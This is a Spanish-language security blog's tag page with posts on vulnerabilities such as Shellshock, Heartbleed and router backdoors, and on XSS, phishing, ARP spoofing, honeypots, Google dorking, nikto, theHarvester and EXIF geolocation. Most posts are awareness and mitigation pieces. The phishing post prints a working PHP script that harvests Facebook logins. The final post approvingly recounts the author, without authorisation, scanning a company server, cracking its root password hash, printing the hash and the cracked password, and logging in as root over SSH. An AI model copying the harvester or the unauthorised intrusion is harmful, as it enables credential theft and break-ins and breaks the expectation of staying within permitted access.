Noticias
Loading...
  • Noticias
  • Presentaciones
  • Eventos

Tab 1 Top Area

Tech News

Game Reviews

ULTIMAS PUBLICACIONES

Mostrando entradas con la etiqueta Hacking. Mostrar todas las entradas
Mostrando entradas con la etiqueta Hacking. Mostrar todas las entradas
jueves, 23 de octubre de 2014
Microsoft Power Point vulnerable a un ataque Zero-Day

Microsoft Power Point vulnerable a un ataque Zero-Day


El día de hoy se dio a conocer que hay una vulnerabilidad con esta herramienta ofimática, cuando ya se habían arreglado otras en este mismo mes por parte de Microsoft, es reportado que afecta a todas las versiones del sistema operativo solamente excluyendo a Windows server 2003.

Temporalmente Microsoft saco un fix y fue confirmado la explotación de esta vulnerabilidad, es dentro del sistema operativo que maneja OLE (Object Linking and Embedding) que maneja documentos compuestos pero también permite transferir datos entre aplicaciones.

La vulnerabilidad designada como CVE-2014-6352, lo que permite la vulnerabilidad es permitir la ejecución de código malicioso si un usuario abre in archivo en office que contenga un objeto OLE, si esto es exitoso el atacante tendrá los permisos del usuario que tratado de abrir el archivo.

Imaginemos lo que puede hacer el atacante una vez con estos permisos, nos podría dejar un backdoor, instalar malware y lo peor de todo es que puede llegar a comprometer una cuenta con permisos de administrador algo no deseado por ningún administrador. 


En días pasados a un usuario conocido le llego de una fuente desconocida un archivo de power point que más tarde lo voy adjuntar para que lo revisen en una máquina que este en un entorno donde no comprometa su seguridad en la cual le pide el archivo que lo repare, si lo prueban en un entorno conocido como Isolate pueden realizar las pruebas para detectar cuando se ejecute el ataque poniendo atención al prompt de UAC, es una pop up alert que requiere de autorización antes de que el sistema operativo permita realizar varias tareas, lo cual nos puede dar un advertencia de que algo no deseado esta pro ejecutar antes de ser comprometidos pidiendo permisos de ejecución. Pero como bien sabemos los usuarios no le dan bola y rápidamente lo permiten.
sábado, 18 de octubre de 2014
Cuando los admins no le dan bola a las notificaciones de vulnerabilidades

Cuando los admins no le dan bola a las notificaciones de vulnerabilidades

Esta publicación es para seguir haciendo consciencia en administradores que deben dar seguimiento a una falla de seguridad, muchas veces no les interesa o no consideran un riesgo la falla que puede afectar a terceros. La semana pasada el equipo de osisecurite le reporto a una gran universidad de la localidad una falla en su pagina web a ataques de XSS.

Aceptaba por la URL etiquetas HTML

















Tambien  javascript :P















Ya con ese finding, podriamos realizar mas cosas como crear un simple php que me guarde en un log todos los visitantes, IP de la WAN y robar las cookies si es que hay una sesion etc...

Un ejemplo seria



Este issue fue reportado antes los administradores del sitio, a lo cual no recibi una respuesta inmediata mas que:

"Gracias por tomarse el tiempo y avisarnos de las fallas en nuestra pagina web, favor de comunicarse con esta persona (correo electronico del admin), para que le notifique.

Para esto utilice la herramienta de harvester, por que no tenia ni puta idea de quien es quien en una organización tan importante asi que todo los corres que encontré les enviamos la notificación hasta la ultima respuesta de la cual no tuvimos una notificación por parte del admin, esperemos y mejoren la falla de seguridad y que nos quede como consejo que cualquier vulnerabilidad reportada debe ser arreglada por mas pequeña que sea y lo mas importante hacerles saber que hay hacking ético (aunque fue una casualidad el finding) que aun reporta los fallos en vez de explotarlos por curiosidad.

sábado, 11 de octubre de 2014
Update de BASH en Macintosh para evitar shellshock

Update de BASH en Macintosh para evitar shellshock

Hace ya varios dias todos estuvimos con la novedad del shellshock una linda vulnerabilidad que tenia mucho entre nosotros pero no habia sido revelada, para esto lo que hicimos rápidamente fue hacer el upgrade de nuestro bash para evitar un ataque. Hasta la fecha sigo encontrando fallas en un muchos servidores e inclusive en ordenadores personales por que no le han dado bola a este fallo, un caso de un amigo que sigue creyendo que por tener una MAC no esta vulnerable :P (iluso) es por eso que me motive a escribir este documento para enseñarles como darse cuenta si estan en riesgo sus equipos y aplicar un parche tan sencillo

Primero como ya se ha mencionado en muchas ocasiones, revisar el siguiente comando:







A lo que me han preguntado y bueno que puedo obtener con eso de que me diga que es vulnerable, y bueno es que ahí claramente se ve que se carga el bash  y ejecute las variables.

Un ejemplo mas claro seria el siguiente, digamos que chapo en sus documentos tiene un file que se llama passwords, vamos a ver como llegar a el.







Con esto ya hemos realizado el listing del archivo buscado y vemos los permisos, por lo que ahora viene lo interesante obtener la información guardada con usuarios ficticios y passwords ficticios (los cuales muchos los siguen guardando de tal manera) nos es buena practica pero para este ejemplo anda bien.

También si usan su imaginación pueden hacer un cat a etc/passwd y luego al shadow y de ahí a tratar de desencriptar que se yo, hay muchas cosas re lindas que podemos realizar, inclusive ya hay modulo para metasploit que nos abren un shell de acuerdo a meterpreter etc...








Ahora viene lo mas interesante el patch para que no nos rompan como en los ejemplos anteriores, para esto obtenemos el update que se hizo release desde el 29 de septiembre.

Lo pueden descargar de aquí todos aquellos que tengan OS X Mavericks10.9.5 o anterior.

Ya una vez parchado probamos los comandos nuevamente:






Como vemos ya no se ejecutan las variables cargadas al bash, entonces es importante que mantengan actualizados sus equipos y con los parches para revertir esta vulnerabilidad.
martes, 15 de abril de 2014
Heartbleed no atendida viola ley en Mexico

Heartbleed no atendida viola ley en Mexico


Como ya a una semana es bien sonado el caso de heartbleed sin faltar las preguntas de: ya has arreglado la vulnerabilidad que llevamos por años pero es un tema reciente. Como resumen esta vulnerabilidad afecta a SSL lo que teoricamente nos portegia todos los datos enviados como un login, etc..

Tomemos en cuenta que SSL es usado por muchos diariamente simplemente al accesar a una red social, correo electronico, amazon, paypal, al realizar transacciones, etc... un ejemplo tan claro de SSL es como alguna vez alguien les dijo cuando veas que empieza la URL con https:// es que estas seguro (alguna vez escucharon a alguien decir eso :p) pues no no estabamos seguros n siquiera viendolo asi.






La desventaja de tener un sitio con est vulnerabilidad explotada, estan expuestos a que el atacante pueda ver toda comunicación entre cliente/servidor, valiendole gorro si estan cifradas o no. Ahora la mayor responsabilidad en este caso es de la empresa por que donde su servidor ofrece el servicio esta roto, vulnerable, no estan protegiendo la privacidad de la datos de sus usuarios. Se dice que el proveedor en México con este fallo debe de avisar a sus usuarios lo siguiente:


  • Si el sitio cuenta con esta vulnerabilidad o no.
  • Si cuenta con la vulnerabilidad, reportar a los usuarios si ya fue resuelta o el due date para resolverlo.
  • Si ya fue resuelto informar a los usuarios que cambien le password. (muchos diran por que no cambiar el pasword antes, que sentido tendria si el atacante sigue explotando la vulnerabilidad)
Ahora algo que tomar en consideracion si no toman en cuenta las organizaciones sobre esta vulnerabilidad y no siguen los pasos estipulados estan violando la ley LFPDPPP por que estan dejando expuestos a los usuarios sin aviso.

Para esto caso es recomendable que los usuarios no cambien contraseñas, no envien transaciones financieras, ni utilizar datos personales hasta que el proveedor mencione los puntos mencionados anteriormente, ya que el us, usuario promedio desconoce, desconocera por los siglos de los siglos si el sitio es vulnerable o no, asi que es responsabilidad de la empresa notificar.

¿Que empresa Mexicana te ha reportado sobre este fallo?
jueves, 6 de febrero de 2014
Comuniad Gr2Dest - Seguridad Informatica y Hacking Etico

Comuniad Gr2Dest - Seguridad Informatica y Hacking Etico


Gr2Dest.org es un grupo de estudio, abierto a todo aquel que quiera aprender y enseñar sobre Seguridad Informática y Hacking Ético.

Es una comunidad nueva que ha surgido con la intención de compartir el conocimiento en cuanto a temas de seguridad, hacking, inclusive se han formado grupos en el cual se les asigna una serie de retos para que en equipo encuentre los fallos en seguridad, es una comunidad joven que se le ve mucho potencial y lo mejor de todo que hay muchas personas con las mejores intenciones se enseñar, compartir y con muchas ganas de aprender. Semanalmente se ofrecen charlas en el cual se enseñan
diferentes técnicas, configuraciones para el publico en general.

Se pueden dar de alta en el foro, y también pueden entrar al canal de IRC: 
Canal: #Gr2Dest

Lesrecomiendo ampliamente hacerse parte de esta comunidad que va en crecimiento, para aportar y aprender, cualquier duda se pueden dirigir al foro, y también para ver las sesiones grabadas se pueden dirigir aqui.

Les dejo la ultima charla que se dio por @mirojo  

miércoles, 5 de febrero de 2014
y tu que tipo de informacion subes  a pastebin?

y tu que tipo de informacion subes a pastebin?

Muchas veces es normal que las personas cuando tienen un problema al compilar un kernel de linux, o no pueden instalar un paquetes y quieren mostrar el error que son muchas lineas prefieren hacerlo por pastebin, pero que pasa con aquellos que suben información jugosa, pues aunque no lo crean hay muchos con ese detalle en donde pasan informacion y la hacen publica, bastan con hacer lo siguiente para probar que si hay falla.

de esta manera nos encontramos con personas que suben información sensible, aunque también podríamos encontrar ataques a ciertos lugares los que de cierta manera nos podría ayudar a hacer information gathering.

Asi que si suben algo por paste bin asegúrense de no subir información jugosa que alguien se pueda aprovechar, en este ejemplo fue ssh pero este dork lo pueden ir modificando al gusto.
martes, 7 de enero de 2014
Solución al backdoor de los Routers DSL linksys, Netgear

Solución al backdoor de los Routers DSL linksys, Netgear

Habia mencionado en el articulo de Backdoor en Routers DSL linksys y netgear, que la solucion era el firewall, efectivamente me monte un shorewall en mi red pero para esto tuve que tener un modem que le hiciera bridge a mi DSL Router para poder protegerlo de hacer DROP o un Forward a la ip a una no existente, esa solución funciona a la perfección.

Hay una solución que es mucho mas fácil que le sirvió a un amigo argentino (arp) y en menos tiempo.

Para empezar de nuevo les dejo el código que nos paso el investigar que hace el test de decirte si tu equipo es vulnerable o no, esta hecho en python fue publicado por el autor como poc.py y se lo pueden bajar de aquí, así ya pueden hacer un prueba a su WAN y LAN como se muestre en el ejemplo.

Comenzamos por la LAN


Pasamos a hacer la prueba en la WAN


Ojo para poder hacer la prueba en la LAN y WAN tiene que cambiar la dirección IP en el código donde se tacha lo rojo. si quieren le pueden poner para que ustedes ingresen la dirección cuando corran el programa, yo no le di mucha bola así que la cambie las dos veces.


Ahora la solución mas sencilla nos vamos al GUI del router, en mi caso el que use de prueba es un linksys WAG120N


En el ejemplo podemos ver que lo que se hizo fue un forward para que si llegara por la WAN una petición a ese puerto, en mi caso lo que hice fue le asigne que le diera forward a una dirección que no este en uso, en este ejemplo es una dirección antes del Broadcast (en clase C), para esto tengo el DHCP deshabitado y agrego direcciones IP estáticas a mis otros dispositivos en la red, con ese forward si alguien nos quiere ver por la WAN lo que hace es que te marca un timed out por que no existe la dirección a la que hace forward el router por el puerto vulnerable.

Aqui esta la prueba


Para estar mas seguros que nuestro puerto no nos salga OPEN, vamos a preguntarle a nmap por ese puerto a la dirección que tenemos en la WAN


De esta manera nos ayuda para protegernos de la WAN, esto no quiere decir que dejamos de ser vulnerables en la LAN, pero si te aseguras bien tu entorno, manejas un buen cifrado, escondes tu  SSID, filtras dirección MAC, deshabilitas WPS, apagas el router antes de dormir, estas haciendo fingerprint de lo dispositivos en la LAN, tienes tu metido para identificar NIC´s en modo promiscuo, como todo un paranoico profesional :P, no hay de que preocuparse.
domingo, 5 de enero de 2014
Backdoor en routers DSL Linksys y Netgear

Backdoor en routers DSL Linksys y Netgear

Hay varios dias circulando en la web lo que aparentemente es un backdoor en los equipos mencionados, esta vulnerabilidad da acceso de administrador mediante una petición al puerto 32764 la cual no lleva autenticación. Esto fue documentado por el investigador Eloi Vanderbeken lo pueden encontrar por medio de su twitter, en el GitHub de este investigador podemos encontrar la lista de equipos que se encuentran vulnerables ante este acceso, se menciona que posiblemente pueda esta relacionado con la firma SerComm que elabora routers para cisco entre otros fabricantes por lo que los dispositivos que son vulnerables ante dicho ataque se van sumando a la lista.

Afortunadamente me encontre arrumbado un dispositivo de los modelos mencionados como vulnerables (lista) también les dejo la lista de dispositivos basados en SerComm, y realize unas pueblas de escaneo, confirmando la existencia del puerto vulnerable para la WAN y también del lado de la LAN.


Se dice que en la investigaciones el puerto responde a cualquier petición:

ScMM\xff\xff\xff\xff\x00\x00\x00\x00

Nos vamos a shodan para confirmar la información buscando routers con la respuesta a la petición al puerto



Tome la primera dirección ahora para corroborarlo por un mapeo de puertos



La prueba publicada, dice que es posible obtener un shell del dispositivo sin autenticación con privilegios de administrador, se puede hacer un DoS, un respeto del dispositivo e inclusive obtener el archivo de configuración Routercfg.cfg

Para probar y solucionar este problema me decidi crear una regla en el firewall, inclusive ha sido mencionados en el repositorio que les pase,  solamente se crean unas reglas en firewall (ip tables,etc..)  y les funciona tanto para la WAN y LAN.

Así que si tu DSL router esta en la lista no esta de mas tomar esta medida para evitar lo mencionado anteriormente.











viernes, 30 de agosto de 2013
superman en un backdoor de Technicolor TG852N

superman en un backdoor de Technicolor TG852N

El dia de hoy se me ocurrio publicar este backdoor, para reforzar que mas gente este enterada de esta vulnerabilidad, me ha tocado verlo en casas, instituciones, escuelas, y realmente muchas personas no tienen ni puta idea que esta vulnerabilidad esta.

Es todo va dirigido para todas las personas que tengan como ISP a telnor, telmex y tenga este equipo, les recomiendo mitigarlo no les quita ni cinco minutos.  Tambien lo he visto en los que ofrecen el servicio de infinitum movil, asi que ha mitigarlo.

Realmente este backdoor viene de fabrica, asi como el manejo remoto, asi que les dejo este video para que lo revisen y lo solucionen.


miércoles, 10 de julio de 2013
no image

Un tema Viejo: Pishing

El dia de hoy me encontre con un amigo que me dijo que alguien había accesado a su cuenta de facebook, pero que no creía por que no le habían cambiado el password y el no se lo había pasado a nadie, el caso es que le pregunte que había hecho en la pc, revise su LAN tenia buen cifrado por lo que no vi logs de otras maquinas en su area local que no fueran las del donde pudieran hacer un man in the middle con SSLstrip para sacarle el pasword, el caso que el tipo no tenia ni malware en la maquina pero se había acordado que le llego un mail de "lulu" una nena que le ofrecia fotos, entonces me decidí a revisar el link que le habían enviado.

Ese link no era mas que un pishing que al pobre shore no le daba Ni puta idea que asi le pudiera robar información, el dominio era el siguiente: lulusexosa.zapto.org, con solo verlo me recuerda al cliente de dominios noip.com, y efectivamente era de ahí.

Le habían mandado en esa dirección un índex.php el cual era idéntico al de facebook solamente que le habian cambiado el nombre a las variables de email y pass, el caso que al analizarlo el server que lo alojaba permitia accesar a los archivos en esa carpeta, era un server corriendo en debian con apache y php, ahi me encontre con este código.


<?PHP
$USER = $_POST['email'];
$PASSWORD = $_POST['pass'];
$IP = $_SERVER['REMOTE_ADDR'];
$Correo = 'Correo ="'.$USER.'" ,';
$pwd = 'Password ="'.$PASSWORD.'" ,';
$file = fopen("/var/www/test.txt", "w") or die("can't open file");
fwrite($file,$Correo);
fwrite($file,$pwd);
fclose($file);
header("Location: https://www.facebook.com/");
?>

Un php simple que guardaba el usuario y el password de quien caia en la pagina, y donde alojaba los passwords, oh mi sorpresa estaba el usuario y password de mi gran amigo el cual efectivamente le había dejado a quien sabe quien su información del facebook, para su desgracia el mismo password que utilizo era el que también usa en password.

Le di varias recomendaciones de como manejar sus password, diferentes para otra cuentas que no se repita y sobre todo que no acepte ligas  o archivos de fuentes desconocidas por mas te alborote la hormona alguna mujer con que te enviara fotos o x cosa.

Aprovecho el espacio para que en general tengamos cuidado con estos pequenos detalles, el buen shore se había preocupado por la su cifrado en su WLAN, empleo seguridad en ella, pero olvido el tema de la ingeniería social lo que le comprometió sus cuentas, debemos hacer conciencia  y no aceptar cualquier cosa que nos envíen, debemos tomar precaución por que esta en juego nuestra información y lo mas importante nuestra privacidad.
lunes, 4 de marzo de 2013
no image

Detectando ARP Spoofing en la red local

Cuantas personas siguen conectándose a redes inseguras, como la WI-FI de la facultad, starbucks, redes open, podría decir miles, realmente no le han dado la seriedad a este tipo de temas, en mi caso me da pavor conectarme a redes que no conozco por que no se quien esta en esa red.

Ninguno de nosotros estamos exentos de ser sniffeados, sobre todo en una red insegura de la cual no tenemos el control de los usuarios que accesan, hay herramientas la cuales nos permiten detectar actividad en el protocolo arp cuando algún curioso modifique el trafico, mandando los mensajes falsos asociadas a la dirección IP del router, etc...

Si te gusta conectarte a redes inseguras pero quieres monitorear si hay algun cambios en las direcciones fisicas, capa 2 del modelo OSI, protocolo ARP, una buena opcion es Arpwatch una herramienta que le da seguimiento a los emparejamientos de las direcciones IP.

Arpawatch guarda logs, actividad e incluso puede reportar por correo electrónico, lo veo mas útil esta opción si lo implementas dentro de tu red.

En debian lo instalamos:

sudo apt-get install arpwatch

Para revisar seleccionan la interfaz deseada, eth0, eth1, dependiendo de la que tengan

sudo arpwatch -i eth0

Para ver los los logos bastan con revisar la siguiente ruta

tail -f /var/log/syslog

De esta manera podriamos verificar si alguien esta Spoofeando el ARP y pueden evitar ser pillados por un sslstrip, etc...

martes, 8 de enero de 2013
no image

Honeypots



Hace dias se habían publicado acerca del footprinting para obtener información de ciertos objetivos en particular,  pero también existe la posibilidad de obtener información acerca de los atacantes, aprendemos de ellos para hacer mas seguro nuestro entorno. Lo realizamos por medio de Honeypots por que de esta manera atraemos atacantes haciéndoles creer que nuestro sistema es totalmente vulnerable, en pocas palabras nos mostramos totalmente atractivos para que nos compartan sus secretos.

De esta manera se convierte en una herramienta muy poderosa para las organizaciones por que de esta manera lo que se hace es recabar información acerca de los tipos de ataques lanzados en contra, pero lo mejor de todo es que los podemos hacer pasar tiempo en romper ese honeypot, los mantenemos ocupados para no atacar los objetivos primarios y nos esta avisando que hay un ataque en curso, lo que nos pone en alerta y evitar que el Hax0r llegue a nuestro sistema.

Por ejemplo en backtrack el cual esta muy bien explicado, nos permite la opción de configurar un honeypot que realmente no existe el sistema operativo por lo tanto es una buena medida de seguridad y sobre todo una distracción al atacante, tambien hay Honeypots los cuales si existe el sistema operativo y de esta manera se puede recopilar información muy importante para mejorar nuestra seguridad y aprender nuevas técnicas.

Hace tiempo leia un articulo no recuerdo la pagina si no les daba la liga, pero la policía en USA utilizo un honeypot  de chat para atraer personas dedicadas a la pornografía infantil, así de esta manera los criminales fueron rastreados por sus malas mañas y se les encarcela gracias al honeypot.

Tambien tenemos a las honeynet un gran red recopiladora de nuevos ataques, debido a que son muchos equipos los que son atacados y de esta manera permite recopilacion de mucha informacion, esta es una honeynet dedicada a obtener los ultimos ataques por la cantidad de equipos que son atacados.

Los honyepot son una buena medida de seguridad que se puede implementar fácilmente, si deseas instalar un honeypot y empezarlo a conocer. Tambien tenemos HoneyDrive Desktop que nos permite correr nuestro propio honeypot.

lunes, 7 de enero de 2013
Hacking con Google

Hacking con Google

Anteriormente se comentaba sobre la obtención de información y como se podían encontrar fallas de seguridad con nikto, el día de hoy le toca ser mencionado a una gran herramienta que para muchos es solamente un buscador cualquiera, pero para otros es una herramienta con la cual pueden encontrar alguna vulnerabilidad e información importante que no debiera ser vista por cualquiera.

Hay muchos buscadores en la web pero el día de hoy nos enfocaremos en google, muchos se preguntaran como puedo obtener información con google hay muchas maneras de hacerlo, inclusive ya hay libros como el de informatica64, que me encantaría tener pero por cuestiones de shipping no me sale conveniente pedirlo, espero y un día haya un distribuidor acá en Mexico.

Sabemos que google es el mas grande motor de búsqueda en el mundo, si lo conoces bien sabes que nos permite encontrar información detallada, no es sensitivo a las mayúsculas o minúsculas, es amigo, profesor y como le quieran poner. Google nos permite usar operadores booleanos, operadores aritméticos, el caso es que si no esta bien configurado el servidor, el motor de búsqueda  se convierte en una herramienta para un atacante permitiéndole:

  • información confidencial.
  • Directorios que no deben de estar indexados.
  • logs.
  • Mensajes de error.
  • Extensiones de archivo.
  • Vulnerabilidades en el servidor, etc..

Un ejemplo de encontrar información que revele información que no debiera ser revelada:



De esta manera un atacante esta obteniendo información que pudiera darle un acceso a nuestro sitio, o que pueda obtener información por medio del buscador, es un error en la configuración la cual nos deja vulnerables ante unos simples queries, y por medio de google.  Como les mencionaba anteriormente es un riesgo ya que cualquiera en cualquier parte del mundo puede tener acceso las 24/7 a este tipo de informaron, al menos que pase un milagro y se caiga google (lo dudo), el atacante no tendrá acceso hasta que google restaure el sistema.

La manera en la que podemos evitar que la información se quede indexada es:
  • Primero que nada nos podemos hacer de un scanner para ver muestras vulnerabilidades y arreglarlas ASAP.
  • Remover enlaces viejos.
  • Bloquear el googlebot mediante robots.txt, un dolor de cabeza al comienzo, aun no lo termino de entender pero es muy recomendable.
  • No indexar.
  • Eliminar la cache
El tema es claro, si alguien les quiere encontrar vulnerabilidades o malas configuraciones lo puede obtener sencillamente, lo bueno que ya sabemos que podemos hacer uso de un scanner, y tenemos definiciones en internet para hacer la configuración adecuada y no permitir que por medio de google nos puedan atacar.



sábado, 5 de enero de 2013
Nikto, scanner de servidores web

Nikto, scanner de servidores web

El dia de ayer publique sobre recopilar información con theHarvester, el día de hoy mientras me encontraba en el laburo me pregunto el ary por que no mencionas algún scanner, y es eso es lo que haré el día de hoy. Hablaremos de un scanner para servidores web llamado nikto, es de libre distribución y es conocido por muchos usuarios, esta hecha en Perl, fue creada por Chris Sullo y David Lodge.

Esta herramienta se encarga de hacer footprinting, recopilar información de los servidores web, como por ejemplo si el servidor web no esta actualizado, la configuración, directorios indexados, entre otros.
Solamente necesitamos una dirección ip o nombre de dominio para poder realizar un scan de el servidor web, como muestra el siguiente ejemplo:

sudo nikto -h <webserver>


La opción -h especifica el host que se ha querido hacer scan.

Por defecto nikto trabaja en el puerto 80 pero también podemos especificar el puerto por medio de -p, también nos permite configurar un proxy mediante -useproxy muy útil para los que quieran hacer pruebas con un intermediario, y se tienen mas opciones las cuales puedes ver en la pagina oficial de nikto.

En la configuración de nikto podemos cambiar la manera en la que  nuestro navegador será guardado en los logs donde esta alojado el web server, deben tener en cuenta que al momento de que realicen un scann se van a guardad logs, los cuales contienen información acerca de ustedes, aquí lo pueden ver en la pagina oficial.

Para todos aquellos que tengan un servidor pueden hacer uso de nikto para mejor los aspectos de seguridad, como tener actualizado el servidor, evitar indexar archivos, estar al tanto de cualquier vulnerabilidad que pueda comprometer el sistema, cabe destacar que no todos los resultados que pudiera arrojar nikto tiene que ser necesariamente una vulnerabilidad.

jueves, 3 de enero de 2013
theHarvester, recopilando información

theHarvester, recopilando información

La recopilación de información "Information Gathering" es el comienzo desde 0 y uno de los pasos mas importantes para los pentesters, inclusive puede ser la diferencia entre el éxito y lo fallido.
La información es de lo mas importante, es por eso que para realizar un buen pentesting necesitamos del footprinting, y es el primer paso al momento de llevar a cabo un pentesting.

Hay infinidad de medios para obtener la información como es:

  • Un simple whois.
  • Netcraft.
  • Hacking con buscadores.
  • nslookup
  • search_email_collector
Y hay muchos mas para obtener información, inclusive el pararte fuera de el objetivo para ver quien sale y quien entra, o revisar los botes de basura para obtener información como hizo Mitnick en operation take down.

El tema es que entre mas información recopilemos es mejor, dominios, subdominos, emails, usuarios, hostname, etc... Para esto me tope con una herramienta que nos puede ayudar al momento de hacer information gathering que se llama theHarvester y nos facilita mucha información que debe de ser recopilada, esta herramienta fue hecha en python por Christian Martorella y solo es necesario proporcionar la URL de la cual queremos obtener información y nos proporcionara lo siguiente:

  • Por medio de google, bing, exalead obtener correos, perfiles de empleados, subdominos, hostnames.
  • PGP Servers.
  • Por medio de LinkedIn nos permite obtener información de los perfiles de empleados.
  • Hay una opción que me gusto por que nos permite utilizar la base de datos de shodan.

La sintaxis es muy sencilla, supongamos que vamos a obtener información de x domino, basta con ejecutar el siguiente comando:

sudo ./theHarverster -d <nombre_dominio> -l 300 -b google

-l nos permite limitar la búsqueda por una cantidad especificada.
-b especificamos el motor de búsqueda, si ponemos all lo hará con todos los mencionados anteriormente. 
-f esta función no la especifique en el comando pero nos permite que podamos guardar la información en un archivo html o xml.

Es una herramienta que en manos de algún ingeniero social puede ser de mucha utilidad, esto quiere decir que nuestra información esta para quien la quiera y sepa como obtenerla, una manera en la que podemos hacer para dificultarles la recopilación de información podría ser creando distintas cuentas de correo,  diferentes usuarios para dificultar al ingeniero social.
En niveles empresariales es un poco mas complicado debido a que siguen políticas de correo, por ejemplo nombre.apellido@dominio, o ya tienen un patrón definido para crear los usernames del sistema.
Pero si eres tu quien tiene el control  del sistema y tiene libre albedrío puede comenzar a dificultar el trabajo de los ingenieros sociales.

miércoles, 2 de enero de 2013
Privacidad, tema del pasado

Privacidad, tema del pasado

Años atrás quien pensaba que era solo ciencia ficción que alguien ubicado distante geográficamente podría llevar un control de nuestras vidas, nuestra ubicación en tiempo real, déjenme decirles que eso es posible el día de ahora y no por un gobierno autoritario que nos ha implantado chips en el cuerpo para ubicarnos por medio de GPS.

Nosotros mismos somos los que nos encargamos de darles información inconsciente o conscientemente a las demás personas y de hacerles saber nuestra ubicación geográfica. ¿como es posible eso?, uno de los principales es Facebook, cada cuanto no se da un check in para informar en donde estan, o se hace tag a un conocido o algún lugar al que has visitado.

Otro factor que se encarga de hacerles saber a las personas nuestra ubicación geográfica son los metadatos, es un tema que ya tiene bastante tiempo y que también ha sido mucha veces explicado por chema alonso, acerca de toda la información que puede ser recopilada por los metadatos. De hecho esta un caso interesante de Tony Blair en el que juraba por la reina Isabel que no se había editado un documento, el cual mas tarde descubrieron por los metadatos que su afirmación era falsa.

Retomando el tema inicial de nuestra privacidad y de los metadatos tenemos a Exif es un formato de archivo utilizado por las cámaras digitales, estos datos están incrustado en la imagen, mientras los nuevos programas de manipulación de imágenes pueden detectar el formato Exif, este formato nos da la fecha y hora en que la fotografía fue creada, modelo de la cámara, fabricante, inclusive algunas nos dan localización geográfica, este ultimo siempre y cuando el usuario haya permitido la relación con el GPS, apple es lo primero que pregunta al abrir la cámara

Cuando se toma una foto mediante un smartphone que tiene activado el GPS nos revelan datos como coordenadas geográficas donde la fotografía ha sido tomada, basta ir  a google maps para identificar la localización exacta de donde fue tomada esa fotografía.

Para obtener información relacionada a la geolocalizacion esta Exif Viewer y para los linuxeros esta creepy, desarrollado en python, solo basta con ir a la consola e instalarlo, en  distribuciones como backtrack ya viene incluido.

Un ejemplo de como se obtiene la geolocalizacion ya sea subiendo un archivo con el puro URL en el mismo web:



Si vemos GPS position nos indica las coordenadas de donde fue tomada la fotografía, inclusive se tiene la opción location para ser mas detallado con la API de google maps.



Si alguien desea la visión street view basta con ir a google maps y poner las coordenadas, tendría la vista asi.

Tal vez se preguntan bueno y como puedo solucionar esto, deshabilitar el servicio de geolocalizacion en sus smartphones, sobre todos a aquellos que manejan apple por que la primera vez que abren la Camara les pregunta si quiere informar sobre la ubicación, o en dado caso que no tengan duda en si esta o no esta, vayan a ajustes generales y restaurar localización.

Sin duda alguna tenemos que estar mas al pendiente de nuestros dispositivos para evitar revelar información que pueda invadir nuestra privacidad.
sábado, 29 de diciembre de 2012
no image

WI-FI publico

Lo que es preocupante es la cantidad de personas que se conectan a los WI-FI que están abiertos de manera que le dan facilidad a los delincuentes o curiosos para que hagan el robo de datos. Es un tema muy preocupante en cuestión de seguridad por que si una persona desea pasar una tarjeta online, o cualquier credencial ingresada en ese momento, puede ser interceptada en la red local en la que se encuentra, solo basta un malicioso con un ARP poisoning y listo.

Lo mas preocupante es cuando hay personas que ven una WI-FI abierta y no es precisamente una red de un establecimiento comercial, están poniendo en riesgo su información debido a que muchas de las ocasiones hay personas que dejan abierto el WI-FI y no precisamente por descuido, si no con la intención de interceptar la información. Realmente el usuario que se conecta a esa red no sabe quien esta detrás de ella y si dejamos ir un poco la imaginación podemos ver que la persona que esta detras de la red tiene como intención atraer usuarios a los cuales les hará un ARP Poisoning para posteriormente hacerles un sencillo DNS spoofing y con eso tienen en sus manos un pishing seguro para robar cualquier tipo de información.

Es necesario hacer conciencia al conectarnos a una red publica, o que se encuentre abierta, lo mejor es no conectarse a ella, ni siquiera ya con una VPN, lo recomendable siempre seria conectarse en lugares seguros, en lugares donde ustedes estén conscientes de que no corre riesgo su información a ser interceptada, así que al terminar de leer este post les recomiendo no conectarse a redes publicas y cambiar el cifrado de su router por que los ISP que tenemos acá en la ciudad siempre lo dejan WEP y es un algoritmo tan fácil de romper que por mas seguros que se sientan en casa no será así.


domingo, 23 de diciembre de 2012
no image

Exposición de seguridad informatica

Hace unos dias nos dijeron que tendríamos nuestra primera charla de seguridad informática en la facultad, somos pocos los que estábamos ansiosos por la charla debido que acá en Mexicali nadie le brinda importancia al tema de la seguridad informática, esperamos durante una hora que llegara el auditor y no llegaba el tipo perdido al encontrar la facultad.

El tipo llega y comienza a presentarse, decirnos su trabajo, y como era una platica de seguridad no se pudo evitar la pregunta de ¿Que es Seguridad?, ya algunos tipos respondieron, y yo seguía en la espera del contenido de la seguridad porque el estaba trabajando como encargado de seguridad de una empresa la cual no voy a mencionar por cuestiones de privacidad, el caso es que la platica se torno un poco aburrida por la inseguridad del expositor y el contenido muy pobre en cuanto a seguridad informática.
Recuerdo que nos dijo manejo equipos cisco desde hace años pero no me pregunten por la seguridad de ellos que casi no se. Me quede pasmado y dije bueno si el tipo este es encargado de seguridad como ha podido decir eso, quiere decir que su usuario y contraseña es cisco cisco y aparte tiene habilitado el CDP en los equipos.

Cuando la platica se venia abajo nos dice el tipo, les confesare algo pero requiero de su discreción he realizado un ataque de DoS, ¿saben quien es ANONYMOUS?, al principio pensé que era broma pero el tipo muy enserio nos dijo que bajo el LOIC de la web y que había realizado un ataque a ciertas paginas.

El tema es lo preocupante en mexico el tema de la seguridad informatica, este tipo que se encarga de la seguridad de la empresa, y realmente no tenga la capacitación ni la seriedad para desempeñar el puesto, pero mas culpa tienen las empresas que no quieren invertir en seguridad.
Después de acabar la charla el tipo nos dice el que quiera hacer una auditoria se dará cuenta de que somos impenetrables, en ese momento se me ocurrió correr un nikto para ver si tenia un listing, y efectivamente me tope con este hash

root:e9FWb/4.s87dw

El cifrado era traditional DES [64/64 BS] el cual John the ripper tardo 3 minutos solamente en desencriptarlo

root:creyente

Podemos ver que no hay una política de password en el cual exija una contraseña con minúsculas, mayúsculas, números y caracteres especiales.

Mi sorpresa no acabo ahi porque al ingresar por ssh eran las mismas credenciales, no se debe de usar las mismas credenciales para nada y mucho menos dejar habilitado el root en ssh.

El caso es que en menos de 5 minutos con ningún ingenio ni nada maravilloso se tenia el control de root en todo el sistema una falla tan grave de seguridad.

Es un claro ejemplo que las empresas mexicanas no le dan seriedad a tema de la seguridad.

Copyright © 2014 OSI SECURITE All Right Reserved